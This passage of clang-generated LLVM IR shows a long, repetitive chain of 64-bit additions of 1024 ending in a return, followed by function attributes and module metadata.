  %166 = add nsw i64 %165, 1024
  %167 = add nsw i64 %166, 1024
  %168 = add nsw i64 %167, 1024
  %169 = add nsw i64 %168, 1024
  %170 = add nsw i64 %169, 1024
  %171 = add nsw i64 %170, 1024
  %172 = add nsw i64 %171, 1024
  %173 = add nsw i64 %172, 1024
  %174 = add nsw i64 %173, 1024
  %175 = add nsw i64 %174, 1024
  %176 = add nsw i64 %175, 1024
  %177 = add nsw i64 %176, 1024
  %178 = add nsw i64 %177, 1024
  %179 = add nsw i64 %178, 1024
  %180 = add nsw i64 %179, 1024
  %181 = add nsw i64 %180, 1024
  %182 = add nsw i64 %181, 1024
  %183 = add nsw i64 %182, 1024
  %184 = add nsw i64 %183, 1024
  %185 = add nsw i64 %184, 1024
  %186 = add nsw i64 %185, 1024
  %187 = add nsw i64 %186, 1024
  %188 = add nsw i64 %187, 1024
  %189 = add nsw i64 %188, 1024
  %190 = add nsw i64 %189, 1024
  %191 = add nsw i64 %190, 1024
  %192 = add nsw i64 %191, 1024
  %193 = add nsw i64 %192, 1024
  %194 = add nsw i64 %193, 1024
  %195 = add nsw i64 %194, 1024
  %196 = add nsw i64 %195, 1024
  %197 = add nsw i64 %196, 1024
  %198 = add nsw i64 %197, 1024
  %199 = add nsw i64 %198, 1024
  %200 = add nsw i64 %199, 1024
  %201 = add nsw i64 %200, 1024
  %202 = add nsw i64 %201, 1024
  %203 = add nsw i64 %202, 1024
  %204 = add nsw i64 %203, 1024
  %205 = add nsw i64 %204, 1024
  %206 = add nsw i64 %205, 1024
  %207 = add nsw i64 %206, 1024
  %208 = add nsw i64 %207, 1024
  %209 = add nsw i64 %208, 1024
  %210 = add nsw i64 %209, 1024
  %211 = add nsw i64 %210, 1024
  %212 = add nsw i64 %211, 1024
  %213 = add nsw i64 %212, 1024
  %214 = add nsw i64 %213, 1024
  %215 = add nsw i64 %214, 1024
  %216 = add nsw i64 %215, 1024
  %217 = add nsw i64 %216, 1024
  %218 = add nsw i64 %217, 1024
  %219 = add nsw i64 %218, 1024
  %220 = add nsw i64 %219, 1024
  %221 = add nsw i64 %220, 1024
  %222 = add nsw i64 %221, 1024
  %223 = add nsw i64 %222, 1024
  %224 = add nsw i64 %223, 1024
  %225 = add nsw i64 %224, 1024
  %226 = add nsw i64 %225, 1024
  %227 = add nsw i64 %226, 1024
  %228 = add nsw i64 %227, 1024
  %229 = add nsw i64 %228, 1024
  %230 = add nsw i64 %229, 1024
  %231 = add nsw i64 %230, 1024
  %232 = add nsw i64 %231, 1024
  %233 = add nsw i64 %232, 1024
  %234 = add nsw i64 %233, 1024
  %235 = add nsw i64 %234, 1024
  %236 = add nsw i64 %235, 1024
  %237 = add nsw i64 %236, 1024
  %238 = add nsw i64 %237, 1024
  %239 = add nsw i64 %238, 1024
  %240 = add nsw i64 %239, 1024
  %241 = add nsw i64 %240, 1024
  %242 = add nsw i64 %241, 1024
  %243 = add nsw i64 %242, 1024
  %244 = add nsw i64 %243, 1024
  %245 = add nsw i64 %244, 1024
  %246 = add nsw i64 %245, 1024
  %247 = add nsw i64 %246, 1024
  %248 = add nsw i64 %247, 1024
  %249 = add nsw i64 %248, 1024
  %250 = add nsw i64 %249, 1024
  %251 = add nsw i64 %250, 1024
  %252 = add nsw i64 %251, 1024
  %253 = add nsw i64 %252, 1024
  %254 = add nsw i64 %253, 1024
  %255 = add nsw i64 %254, 1024
  %256 = add nsw i64 %255, 1024
  %257 = add nsw i64 %256, 1024
  %258 = add nsw i64 %257, 1024
  %259 = add nsw i64 %258, 1024
  %260 = add nsw i64 %259, 1024
  %261 = add nsw i64 %260, 1024
  %262 = add nsw i64 %261, 1024
  %263 = add nsw i64 %262, 1024
  %264 = add nsw i64 %263, 1024
  %265 = add nsw i64 %264, 1024
  %266 = add nsw i64 %265, 1024
  %267 = add nsw i64 %266, 1024
  %268 = add nsw i64 %267, 1024
  %269 = add nsw i64 %268, 1024
  %270 = add nsw i64 %269, 1024
  %271 = add nsw i64 %270, 1024
  %272 = add nsw i64 %271, 1024
  %273 = add nsw i64 %272, 1024
  %274 = add nsw i64 %273, 1024
  %275 = add nsw i64 %274, 1024
  %276 = add nsw i64 %275, 1024
  %277 = add nsw i64 %276, 1024
  %278 = add nsw i64 %277, 1024
  %279 = add nsw i64 %278, 1024
  %280 = add nsw i64 %279, 1024
  %281 = add nsw i64 %280, 1024
  %282 = add nsw i64 %281, 1024
  %283 = add nsw i64 %282, 1024
  %284 = add nsw i64 %283, 1024
  %285 = add nsw i64 %284, 1024
  %286 = add nsw i64 %285, 1024
  %287 = add nsw i64 %286, 1024
  %288 = add nsw i64 %287, 1024
  %289 = add nsw i64 %288, 1024
  %290 = add nsw i64 %289, 1024
  %291 = add nsw i64 %290, 1024
  %292 = add nsw i64 %291, 1024
  %293 = add nsw i64 %292, 1024
  %294 = add nsw i64 %293, 1024
  %295 = add nsw i64 %294, 1024
  %296 = add nsw i64 %295, 1024
  %297 = add nsw i64 %296, 1024
  %298 = add nsw i64 %297, 1024
  %299 = add nsw i64 %298, 1024
  %300 = add nsw i64 %299, 1024
  %301 = add nsw i64 %300, 1024
  %302 = add nsw i64 %301, 1024
  %303 = add nsw i64 %302, 1024
  %304 = add nsw i64 %303, 1024
  %305 = add nsw i64 %304, 1024
  %306 = add nsw i64 %305, 1024
  %307 = add nsw i64 %306, 1024
  %308 = add nsw i64 %307, 1024
  %309 = add nsw i64 %308, 1024
  %310 = add nsw i64 %309, 1024
  %311 = add nsw i64 %310, 1024
  %312 = add nsw i64 %311, 1024
  %313 = add nsw i64 %312, 1024
  %314 = add nsw i64 %313, 1024
  %315 = add nsw i64 %314, 1024
  %316 = add nsw i64 %315, 1024
  %317 = add nsw i64 %316, 1024
  %318 = add nsw i64 %317, 1024
  ret i64 %318
}
 
attributes #0 = { noinline nounwind optnone uwtable "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }
 
!llvm.module.flags = !{!0}
!llvm.ident = !{!1}
 
!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"Ubuntu clang version 12.0.0-3ubuntu1~20.04.5"}